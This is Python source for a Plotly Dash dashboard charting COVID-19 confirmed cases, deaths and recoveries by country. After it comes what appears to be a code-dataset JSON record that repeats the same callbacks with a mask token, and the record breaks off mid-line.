y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6), go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#648FFF', width = 3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Confirmed Cases: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width = 3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#009E73', width = 3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) return vals,final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'],{'data':trace_1, 'layout': layout_t1},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'],{'data':trace_2, 'layout':layout_t2},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Recovered_Diff'],{'data':trace_3, 'layout':layout_t3} else: options = ['Confirmed','Recovered','Deaths', 'Total and Daily Confirmed Cases'] vals = [{'label': i, 'value': i} for i in options] trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6), go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#648FFF', width = 3))] layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Confirmed Cases: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6), go.Scatter(name='5 Day Moving Average', x = final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#DC267F', width = 3))] layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Deaths: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6), go.Scatter(name='5 Day Moving Average', x=final_df.loc[(final_df['Country_Region'] == selected_country),'Date'].tail(45), y=final_df.loc[(final_df['Country_Region'] == selected_country),'Recovered_Diff'].tail(45).rolling(window=5).mean(), mode='lines', line=dict(color='#009E73', width = 3))] layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Daily Recovered: {0} (Last 45 Days)'.format(selected_country), xaxis={'type': 'date', 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, height=300, legend=dict(x=.2, y=-.15, orientation='h')) return vals,final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Confirmed_Diff'],{'data':trace_1, 'layout': layout_t1},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Deaths_Diff'],{'data':trace_2, 'layout':layout_t2},final_df.loc[(final_df['Date'] == final_df['Date'].max()) & (final_df['Country_Region'] == selected_country), 'Recovered_Diff'],{'data':trace_3, 'layout':layout_t3} @app.callback( Output(component_id='box-1',component_property='figure'), [Input(component_id='main-dropdown', component_property = 'value'), Input(component_id='main-dropdown-2', component_property = 'value')]) def update_maingraph(selected_country, selected_graph): if selected_graph is None and selected_country is None: selected_country = 'Canada' figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Overall Progression of COVID-19: {0}'.format(str(selected_country)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data':figmain_t, 'layout': figmain_l} elif selected_graph is None and selected_country is not None: figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], marker_color='#648FFF')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Overall Progression of COVID-19: {0}'.format(str(selected_country)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data':figmain_t, 'layout': figmain_l} elif selected_graph == 'Total and Daily Confirmed Cases': figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'], line=dict(color='#1A85FF', width = 1.5), mode='lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y=final_df.loc[(final_df['Country_Region'] == selected_country),'Confirmed_Diff'], line=dict(color='#D41159', width = 3), mode='lines', fill='tozeroy')] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,'Confirmed'].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str(selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date',fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data':figmain_t, 'layout': figmain_l} else: cols_dict = {'Confirmed':'#648FFF', 'Deaths':'#DC267F', 'Recovered':'#009E73'} figmain_t = [go.Bar(name='Total {0}'.format(selected_graph), x=final_df.loc[(final_df['Country_Region'] == selected_country) ,'Date'], y = final_df.loc[(final_df['Country_Region'] == selected_country) ,selected_graph], marker_color=cols_dict[selected_graph])] figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range':[0, (final_df.loc[(final_df['Country_Region'] == selected_country) ,selected_graph].max() * 1.10)], 'automargin': True, 'showline':True, 'mirror':False, 'linewidth':2, 'linecolor':'black'}, title='Overall Progression of COVID-19 ({0}): {1}'.format(str(selected_country), str(selected_graph)), hovermode='x unified', xaxis=dict(title='Date', fixedrange=True, automargin=True, showline=True, mirror=False, linewidth=2, linecolor='black')) return {'data':figmain_t, 'layout': figmain_l} if __name__ == '__main__': app.run_server()
flexible
{ "blob_id": "1e02d584cde0cdf251aa36abd27b683219ef87ed", "index": 7539, "step-1": "<mask token>\n\n\n@app.callback(Output(component_id='global-box-1', component_property=\n 'figure'), [Input(component_id='global-dropdown', component_property=\n 'value')])\ndef global_update(select_global):\n if select_global == 'Global Cases Trend' or select_global is None:\n fig1000 = []\n anno = []\n for group, dataframe in cases_1000_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 1000 Cases'])\n trace = go.Scatter(x=di['Days Since 1000 Cases'].tolist(), y=di\n ['Confirmed'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Confirmed Cases: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 1000 Cases'].max() + 1.5), 'y': np\n .log10(int(di['Confirmed'].max())), 'xref': 'x', 'yref':\n 'y', 'showarrow': False, 'text': list(di.loc[:,\n 'Country_Region'])[0], 'xanchor': 'right', 'yanchor':\n 'middle', 'align': 'center', 'font': {'size': 8, 'color':\n 'black'}, 'bordercolor': '#ffffff', 'borderwidth': 1,\n 'borderpad': 1, 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig1000.append(trace)\n anno.append(a)\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.2310491 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Cases Double Every 3 Days'], hovertemplate=\n '<b>Cases Double Every 3 Days</b>', showlegend=True))\n fig1000.append(go.Scatter(x=list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max())), y=[(1000 * math.exp(0.099021 *\n i)) for i in list(np.arange(cases_1000_start[\n 'Days Since 1000 Cases'].max()))], name=\n 'Cases Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Cases Double Every 7 Days'], hovertemplate=\n '<b>Cases Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title':\n 'Number of Confirmed Cases', 'range': [np.log10(1000), np.log10\n (cases_1000_start['Confirmed'].max() * 1.1)], 'type': 'log',\n 'fixedrange': True, 'linewidth': 2, 'linecolor': 'black',\n 'showgrid': False, 'dtick': 1, 'showline': True, 'mirror': \n False}, title='Overall Confirmed Cases', xaxis={'title':\n 'Days Since First 1000 Cases', 'range': [0, cases_1000_start[\n 'Days Since 1000 Cases'].max()], 'fixedrange': True,\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig1000, 'layout': layout_global}\n return fig_global\n elif select_global == 'Global Deaths Trend':\n fig100 = []\n anno = []\n for group, dataframe in deaths_100_start.groupby(by='Country_Region'):\n di = dataframe.sort_values(by=['Days Since 100 Deaths'])\n trace = go.Scatter(x=di['Days Since 100 Deaths'].tolist(), y=di\n ['Deaths'].tolist(), mode='lines', line=dict(color=\n colors_dict_global[list(di.loc[:, 'Continent'])[0]], width=\n 1), opacity=0.6, text=di.Country_Region.tolist(),\n legendgroup=list(di.loc[:, 'Continent'])[0], hovertemplate=\n '<b>%{text}</b><br>' + '<br>Deaths: %{y}<br>' +\n 'Days Since First 1000 Cases: %{x}<br>', showlegend=False)\n a = {'x': int(di['Days Since 100 Deaths'].max() + 1.5), 'y': np\n .log10(int(di['Deaths'].max())), 'xref': 'x', 'yref': 'y',\n 'showarrow': False, 'text': list(di.loc[:, 'Country_Region'\n ])[0], 'xanchor': 'right', 'yanchor': 'middle', 'align':\n 'center', 'font': {'size': 8, 'color': 'black'},\n 'bordercolor': '#ffffff', 'borderwidth': 1, 'borderpad': 1,\n 'bgcolor': '#ffffff', 'opacity': 0.6}\n fig100.append(trace)\n anno.append(a)\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.2310491 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 3 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dash'), text=[\n '# of Deaths Double Every 3 Days'], hovertemplate=\n '<b>Deaths Double Every 3 Days</b>', showlegend=True))\n fig100.append(go.Scatter(x=list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max())), y=[(100 * math.exp(0.099021 *\n i)) for i in list(np.arange(deaths_100_start[\n 'Days Since 100 Deaths'].max()))], name=\n 'Deaths Double Every 7 Days', mode='lines', opacity=0.25, line=\n dict(color='grey', width=3, dash='dot'), text=[\n '# of Deaths Double Every 7 Days'], hovertemplate=\n '<b>Deaths Double Every 7 Days</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Deaths',\n 'range': [np.log10(100), np.log10(cases_1000_start['Deaths'].\n max() * 1.1)], 'type': 'log', 'fixedrange': True, 'linewidth': \n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, title='Overall Deaths',\n xaxis={'title': 'Days Since First 100 deaths', 'range': [0,\n deaths_100_start['Days Since 100 Deaths'].max()], 'fixedrange':\n True, 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'showline': True, 'mirror': False}, height=750, hovermode=\n 'closest', annotations=anno)\n fig_global = {'data': fig100, 'layout': layout_global}\n return fig_global\n elif select_global == '% Mortality by Confirmed Cases (Top 20 Countries)':\n figmort = []\n anno = []\n m = mort.sort_values(by=['Confirmed'], ascending=False).head(20)\n m = m.sort_values(by=['Mortality_Percent'], ascending=True\n ).reset_index()\n for i in range(len(m)):\n m1 = m.loc[i, 'Country_Region']\n m2 = m.loc[i, 'Mortality_Percent']\n trace = go.Bar(name='Observed Case - Mortality Ratio', x=[m2],\n y=[m1], text=[round(m.loc[i, 'Mortality_Percent'], 2)],\n orientation='h', textposition='auto', marker=dict(color=\n '#FFB000', opacity=0.6, line=dict(color=\n 'rgba(255,176,0, 1)', width=1)), hovertemplate=\n '<b>%{y}</b><br>' +\n '<br>Observed Case Mortaility Pct: %{text}&#37;<br>',\n showlegend=False)\n figmort.append(trace)\n layout_global = go.Layout(yaxis={'title': 'Country / Region',\n 'fixedrange': True, 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Observed Case - Mortality Ratio', xaxis={'title':\n '% Mortality by Confirmed Cases (Top 20 Countries)', 'range': [\n 0, m['Mortality_Percent'].max() + 2], 'fixedrange': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=750, hovermode='closest')\n fig_global = {'data': figmort, 'layout': layout_global}\n return fig_global\n elif select_global == 'Recoveries vs. Deaths By Country':\n figscat = []\n rc = mort.loc[(mort['Deaths'] >= 100) & (mort['Recovered'] >= 100)\n ].reset_index()\n for i in range(len(rc)):\n scat = go.Scatter(x=[rc.loc[i, 'Deaths']], y=[rc.loc[i,\n 'Recovered']], mode='markers+text', text=[rc.loc[i,\n 'Country_Region']], marker_color=colors_dict_global[rc.loc[\n i, 'Continent']], showlegend=False, marker=dict(size=12,\n line_width=1, opacity=0.75), hovertemplate=\n '<b>%{text}</b><br>' + '<br>Recoveries: %{y}<br>' +\n 'Deaths: %{x}<br>', textposition='bottom center', textfont=\n dict(size=10, color='rgba(0, 0, 0, 0.6)'))\n figscat.append(scat)\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[i for i in list(np.linspace(100, rc['Deaths'].max(),\n 3))], mode='lines', name='Deaths = Recoveries', opacity=0.25,\n line=dict(color='grey', width=1), text=[\n '# of Deaths = # of Recoveries'], hovertemplate=\n '<b># of Deaths = # of Recoveries</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i * 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Recoveries for Every Death',\n opacity=0.25, line=dict(color='green', width=3, dash='dash'),\n text=['2 Recoveries for Every Death'], hovertemplate=\n '<b>2 Recoveries for Every Death</b>', showlegend=True))\n figscat.append(go.Scatter(x=list(np.linspace(100, rc['Deaths'].max(\n ), 3)), y=[(i / 2) for i in list(np.linspace(100, rc['Deaths'].\n max(), 3))], mode='lines', name='2 Deaths for Every Recovery',\n opacity=0.25, line=dict(color='firebrick', width=3, dash='dash'\n ), text=['2 Deaths for Every Recovery'], hovertemplate=\n '<b>2 Deaths for Every Recovery</b>', showlegend=True))\n layout_global = go.Layout(yaxis={'title': 'Number of Recoveries',\n 'fixedrange': True, 'automargin': True, 'range': [np.log10(100),\n np.log10(rc['Recovered'].max() * 1.1)], 'type': 'log',\n 'linewidth': 2, 'linecolor': 'black', 'showgrid': False,\n 'dtick': 1, 'showline': True, 'mirror': False}, title=\n 'Recoveries vs. Deaths, By Country', xaxis={'title':\n 'Number of Deaths', 'fixedrange': True, 'range': [np.log10(100),\n np.log10(rc['Deaths'].max() * 1.1)], 'type': 'log', 'linewidth':\n 2, 'linecolor': 'black', 'showgrid': False, 'dtick': 1,\n 'showline': True, 'mirror': False}, height=750, hovermode='closest'\n )\n fig_global = {'data': figscat, 'layout': layout_global}\n return fig_global\n\n\n@app.callback([Output(component_id='main-dropdown-2', component_property=\n 'options'), Output(component_id='btext1', component_property='children'\n ), Output(component_id='subplot1', component_property='figure'), Output\n (component_id='btext2', component_property='children'), Output(\n component_id='subplot2', component_property='figure'), Output(\n component_id='btext3', component_property='children'), Output(\n component_id='subplot3', component_property='figure')], [Input(\n component_id='main-dropdown', component_property='value')])\ndef update_country(selected_country):\n if selected_country is None:\n selected_country = 'Canada'\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n else:\n options = ['Confirmed', 'Recovered', 'Deaths',\n 'Total and Daily Confirmed Cases']\n vals = [{'label': i, 'value': i} for i in options]\n trace_1 = [go.Bar(name='Daily Cases', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'].tail(45), marker_color='#648FFF', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Confirmed_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#648FFF', width=3))]\n layout_t1 = go.Layout(yaxis={'title': 'Number of Confirmed Cases',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Confirmed Cases: {0} (Last 45 Days)'.format(\n selected_country), xaxis={'type': 'date', 'automargin': True,\n 'showline': True, 'mirror': False, 'linewidth': 2, 'linecolor':\n 'black'}, height=300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_2 = [go.Bar(name='Daily Deaths', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45), marker_color='#DC267F', opacity=0.6),\n go.Scatter(name='5 Day Moving Average', x=final_df.loc[final_df\n ['Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Deaths_Diff'].tail(45).rolling(window=5).mean(), mode='lines',\n line=dict(color='#DC267F', width=3))]\n layout_t2 = go.Layout(yaxis={'title': 'Number of Deaths',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Deaths: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n trace_3 = [go.Bar(name='Daily Recoveries', x=final_df.loc[final_df[\n 'Country_Region'] == selected_country, 'Date'].tail(45), y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Recovered_Diff'].tail(45), marker_color='#009E73', opacity=0.6\n ), go.Scatter(name='5 Day Moving Average', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'].tail(45\n ), y=final_df.loc[final_df['Country_Region'] ==\n selected_country, 'Recovered_Diff'].tail(45).rolling(window=5).\n mean(), mode='lines', line=dict(color='#009E73', width=3))]\n layout_t3 = go.Layout(yaxis={'title': 'Number of Recovered',\n 'automargin': True, 'showline': True, 'mirror': False,\n 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Daily Recovered: {0} (Last 45 Days)'.format(selected_country),\n xaxis={'type': 'date', 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, height=\n 300, legend=dict(x=0.2, y=-0.15, orientation='h'))\n return vals, final_df.loc[(final_df['Date'] == final_df['Date'].max\n ()) & (final_df['Country_Region'] == selected_country),\n 'Confirmed_Diff'], {'data': trace_1, 'layout': layout_t1\n }, final_df.loc[(final_df['Date'] == final_df['Date'].max()) &\n (final_df['Country_Region'] == selected_country), 'Deaths_Diff'], {\n 'data': trace_2, 'layout': layout_t2}, final_df.loc[(final_df[\n 'Date'] == final_df['Date'].max()) & (final_df['Country_Region'\n ] == selected_country), 'Recovered_Diff'], {'data': trace_3,\n 'layout': layout_t3}\n\n\n@app.callback(Output(component_id='box-1', component_property='figure'), [\n Input(component_id='main-dropdown', component_property='value'), Input(\n component_id='main-dropdown-2', component_property='value')])\ndef update_maingraph(selected_country, selected_graph):\n if selected_graph is None and selected_country is None:\n selected_country = 'Canada'\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph is None and selected_country is not None:\n figmain_t = [go.Bar(name='Total Confirmed Cases', x=final_df.loc[\n final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], marker_color='#648FFF')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': True,\n 'mirror': False, 'linewidth': 2, 'linecolor': 'black'}, title=\n 'Overall Progression of COVID-19: {0}'.format(str(\n selected_country)), hovermode='x unified', xaxis=dict(title=\n 'Date', fixedrange=True, automargin=True, showline=True, mirror\n =False, linewidth=2, linecolor='black'))\n return {'data': figmain_t, 'layout': figmain_l}\n elif selected_graph == 'Total and Daily Confirmed Cases':\n figmain_t = [go.Scatter(name='Total Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'], line=dict(color='#1A85FF', width=1.5), mode=\n 'lines'), go.Scatter(name='Daily Confirmed Cases', x=final_df.\n loc[final_df['Country_Region'] == selected_country, 'Date'], y=\n final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed_Diff'], line=dict(color='#D41159', width=3), mode=\n 'lines', fill='tozeroy')]\n figmain_l = go.Layout(yaxis={'title': 'Number of Cases', 'range': [\n 0, final_df.loc[final_df['Country_Region'] == selected_country,\n 'Confirmed'].max() * 1.1], 'automargin': True, 'showline': 